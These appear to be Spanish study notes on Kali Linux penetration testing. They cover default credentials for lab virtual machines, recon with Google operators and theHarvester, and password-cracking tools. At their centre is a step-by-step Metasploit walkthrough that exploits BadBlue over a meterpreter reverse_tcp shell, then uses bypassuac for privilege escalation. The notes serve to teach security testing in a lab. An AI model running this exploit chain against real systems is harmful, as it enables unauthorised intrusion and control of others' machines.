Anda di halaman 1dari 3

KALI LINUX, si aparece un error al momento de abrir la maquina virtual solo debemos ingresar al

setup y allí activamos la virtualización tecnológica y listo. Para ingresar usamos usuario = root y la
contraseña es =toor.

Comandos:

COMANDOS DESCRIPCION
Pwd Muestra en que ruta estamos localizados
Cd Cambio de directorio
Mkdir Crear un directorio
Ls (parámetro -a) Permite listar directorios
Cp Permite copiar archivos
Mv Mover o renombrar archivos
Tar Para comprimir/descomprimir archivos,copias
de seguridad
Rm Comando para borrar un archivo
Cat Permite la visualización de archivos
Clear Limpia la pantalla
Passwd Se usa para cambiar el password de un usuario
Chmod Permisos sobre archivos
./nombre_script Para ejecutar un script
nano Para invocar un generador de texto
Ifconfig o netstat Saber dirección ip
Locate Buscar archivos
Rdesktop dirección ip Ingresar al equipo

METASPLOITABLE: la cargamos en la maquina virtual en este caso VMWARE iniciamos con usuario:
msfadmin y la clave: msfadmin.

OWASPBWP: sirve para hacer ataques a aplicaciones web, la cargamos en la maquina virtual en
este caso VMWARE iniciamos con usuario: root y la clave: owaspbwa.

GOOGLE HACKING: desde Google podemos hace consultas mas minuciosas con algunos
operadores de búsqueda.

OPERADORES DESCRIPCION
Intitle Permite buscar palabras claves en el título de la pagina
Allintitle Similar a la anterior, pero para varias palabras
Inurl Palabra clave para la url
Site Filtrar una búsqueda solo a un sitio web-dominio
Ext or filetype Búsqueda de extenciones o un archivo particular (como
un pdf, docx, ect.)
Allintext Búsqueda de palabras claves
link Enlaces externos a una pagina
RECON-NG: es una herramienta que permite recolectar información, ya viene instalada en Kali
Linux.

THEHARVESTER: es un scrip diseñado en Python y sirve para recolectar información como (correos,
subdominios, hots, empleados).

COMANDOS DESCRIPCION
-D DOMINIO A BUSCAR O NOMBRE
-B BUSCAR DATOS EN MOTORES DE BUSQUEDA
-L LIMITAR LA CANTIDAD QUE QUEREMOS
-H USAR SHODAN

Ejemplo sintaxis: theharvestar


Theharvester -d casaroca.org -l 1000 -b all -h

CEWL: es un scrip diseñado en ruby y sirve para

METASPLOIT

NMAP

JHON RIPPER

NESSUS

WIRESHARK

OPHCRACK

SHODAN: motor de búsqueda centrado en equipos conectador a internet por ejemplo camaras,
camaras web, ect.
PASSWROD ATTACKS

NETCRAFT: buscador que puede ayudar a encontrar información mas interna. Búsquedas de arl.

Ingresamos a Kali Linux Comando para atacar “nmap -sS 192.168.1.168” y presionamos enter, con
este comando identificaremos los puestos abiertos que tenga el equipo el cual queramos atacar.
“nmap -sS 192.168.1.68 -sV -p 21,80” este comando nos sirve para identificar que protocolos y que
versión esta usando los puertos 21 y 80 por ejemplo (fileZila ftdp, badblue http 2.7) los cuales se
encuentran abiertos en ese equipo. Después de esto podemos buscar debilidades de esas dichas
marcas en internet. Para empezar el ataque abrimos metasploit y buscamos el código malicioso
para la marca badblue, con el comando “search badblue” ya aquí nos busca los exploit que
podemos usar en nuestro caso usaremos el segundo y el comando seria ”use
exploit/Windows/http/badblue_passthru” y presionamos enter, luego ingresamos el comando
“show options” aquí nos muestran las opciones luego ingresamos la dirección ip que deseamos
atacar con el comando “set rhost 192.168.1.168” y presionamos enter, luego ingresamos otro
comando “set payload Windows/meterpreter/reverse_tcp” y presiono enter. Con esto indico que
inyectare un código meterpreter para que ella me mande una respuesta, ingresamos el comando
“show options” aquí me va a mostrar porque puerto por el cual un puerto de reversa del ataque
por ejemplo (4444), ingreso el comando “ifconfig” el cual me va a mostrar mi información como
dirección ip mascara de subred, luego ingresamos el comando “set lhost 192.168.1.58” y
presionamos enter luegro buscamos por el puerto que encontramos ingresando el comando “set
lport 4444” y presionamos enter, luego ingresamos en código “show options” y presionamos
enter, luego ingresaremos el comando “exploit” y presionamos enter. Después mos mostrara una
Shell en este caso fue meterpreter, luego ingresamos el comando “help” y presionamos enter aquí
podemos ver lo que podemos tener acceso por ejemplo cámara, etc. Luego ingresamos el
comando “sysinfo” presionamos enter aquí podremos ver que sistema operativo maneja el equipo
a atacar, luego ingresamos el comando “shell” enter y nuevamente ingresamon el comando
“mkdir arnold” ya solo ingresando el comando dir podemos observar la información del disco c:.
volvemos a la Shell de meterpreter con el comando “exit”, ingresamos el comando “background” y
enter y luego el comando “search bypassuac” aquí nos mostrara unas opciones de ese comando
en este caso escogeremos el primero el comando es “use exploit/Windows/local/bypassuac” enter
y otro comando que ya usamos ”set payload Windows/meterpreter/reverse_tcp” enter “show
options” enter “sessions” enter aque nos muestra que sesiones están activas en ese equipo.

TCH-HYDRA: aplicación orientada por comandos y por forma grafica, para combinar usuarios y
contraseñas.

OPHCRACK: aplicación para encontrar hast en las versiones de Windows.

CRACKSTATION.NET: es una pagina online que nos puede brindar ayuda al momento de cifrar las
contraseñas con hast.

Anda mungkin juga menyukai